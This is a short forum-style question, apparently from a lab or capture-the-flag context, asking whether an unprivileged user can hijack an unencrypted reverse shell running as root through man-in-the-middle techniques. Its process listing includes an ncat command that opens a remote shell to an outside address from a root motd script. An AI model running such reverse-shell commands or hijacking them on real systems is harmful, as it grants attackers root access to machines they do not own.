# Is it possible to hijack an active reverse shell?

Tags: man-in-the-middle

Is it possible, via MITM attacks (or other techniques), to hijack an active reverse shell that is running as root, while I am an unprivileged user?

```
root      2108  2107  0 13:55 ?        00:00:00 /bin/bash /usr/local/bin/run-parts --lsbsysinit /etc/update-motd.d
root      2109  2108  0 13:55 ?        00:00:00 ./tmp/ncat 10.10.15.37 4444 -e /bin/sh
root      2110  2109  0 13:55 ?        00:00:00 /bin/sh
```

I was thinking about that due to the fact that the connection is not encrypted.